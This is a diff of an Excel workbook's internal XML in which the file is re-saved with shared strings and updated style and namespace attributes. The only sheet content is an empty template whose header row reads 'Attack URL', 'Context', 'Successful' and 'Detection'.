-    <workbookView visibility="visible" minimized="0" showHorizontalScroll="1" showVerticalScroll="1" showSheetTabs="1" xWindow="0" yWindow="0" windowWidth="20490" windowHeight="7020" tabRatio="600" firstSheet="0" activeTab="0" autoFilterDateGrouping="1"/>
+    <workbookView xWindow="0" yWindow="0" windowWidth="20490" windowHeight="7020"/>
   </bookViews>
   <sheets>
-    <sheet xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" name="Sheet1" sheetId="1" state="visible" r:id="rId1"/>
+    <sheet name="Sheet1" sheetId="1" r:id="rId1"/>
   </sheets>
-  <definedNames/>
-  <calcPr calcId="0" fullCalcOnLoad="1"/>
+  <calcPr calcId="0"/>
 </workbook>
 </file>
 
+<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="4" uniqueCount="4">
+  <si>
+    <t>Attack URL</t>
+  </si>
+  <si>
+    <t>Context</t>
+  </si>
+  <si>
+    <t>Successful</t>
+  </si>
+  <si>
+    <t>Detection</t>
+  </si>
+</sst>
+</file>
+
 <file path=xl/styles.xml><?xml version="1.0" encoding="utf-8"?>
-<styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
-  <numFmts count="0"/>
-  <fonts count="1">
+<styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:x16r2="http://schemas.microsoft.com/office/spreadsheetml/2015/02/main" mc:Ignorable="x14ac x16r2">
+  <fonts count="1" x14ac:knownFonts="1">
     <font>
+      <sz val="11"/>
+      <color theme="1"/>
       <name val="Calibri"/>
       <family val="2"/>
-      <color theme="1"/>
-      <sz val="11"/>
       <scheme val="minor"/>
     </font>
   </fonts>
   <fills count="2">
     <fill>
-      <patternFill/>
+      <patternFill patternType="none"/>
     </fill>
     <fill>
       <patternFill patternType="gray125"/>
@@ -46,12 +67,21 @@
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
   </cellStyleXfs>
   <cellXfs count="1">
-    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" pivotButton="0" quotePrefix="0" xfId="0"/>
+    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
   </cellXfs>
   <cellStyles count="1">
     <cellStyle name="Normal" xfId="0" builtinId="0"/>
   </cellStyles>
+  <dxfs count="0"/>
   <tableStyles count="0" defaultTableStyle="TableStyleMedium2" defaultPivotStyle="PivotStyleLight16"/>
+  <extLst>
+    <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{EB79DEF2-80B8-43e5-95BD-54CBDDF9020C}">
+      <x14:slicerStyles defaultSlicerStyle="SlicerStyleLight1"/>
+    </ext>
+    <ext xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" uri="{9260A510-F301-46a8-8635-F512D64BE5F5}">
+      <x15:timelineStyles defaultTimelineStyle="TimeSlicerStyleLight1"/>
+    </ext>
+  </extLst>
 </styleSheet>
 </file>
 
@@ -317,45 +347,31 @@
 </file>
 
 <file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
-<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
-  <sheetPr>
-    <outlinePr summaryBelow="1" summaryRight="1"/>
-    <pageSetUpPr/>
-  </sheetPr>
+<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
   <dimension ref="A1:D1"/>
   <sheetViews>
-    <sheetView tabSelected="1" workbookViewId="0">
-      <selection activeCell="A2" sqref="A2:D49"/>
-    </sheetView>
+    <sheetView tabSelected="1" workbookViewId="0"/>
   </sheetViews>
-  <sheetFormatPr baseColWidth="8" defaultRowHeight="15"/>
+  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
   <cols>
-    <col width="109.7109375" customWidth="1" min="1" max="1"/>
-    <col width="13.5703125" customWidth="1" min="2" max="2"/>
-    <col width="13.7109375" customWidth="1" min="3" max="3"/>
-    <col width="96.42578125" customWidth="1" min="4" max="4"/>
+    <col min="1" max="1" width="109.7109375" customWidth="1"/>
+    <col min="2" max="2" width="13.5703125" customWidth="1"/>
+    <col min="3" max="3" width="13.7109375" customWidth="1"/>
+    <col min="4" max="4" width="96.42578125" customWidth="1"/>
   </cols>
   <sheetData>
-    <row r="1">
-      <c r="A1" t="inlineStr">
-        <is>
-          <t>Attack URL</t>
-        </is>
+    <row r="1" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A1" t="s">
+        <v>0</v>
       </c>
-      <c r="B1" t="inlineStr">
-        <is>
-          <t>Context</t>
-        </is>
+      <c r="B1" t="s">
+        <v>1</v>
       </c>
-      <c r="C1" t="inlineStr">
-        <is>
-          <t>Successful</t>
-        </is>
+      <c r="C1" t="s">
+        <v>2</v>
       </c>
-      <c r="D1" t="inlineStr">
-        <is>
-          <t>Detection</t>
-        </is>
+      <c r="D1" t="s">
+        <v>3</v>
       </c>
     </row>
   </sheetData>
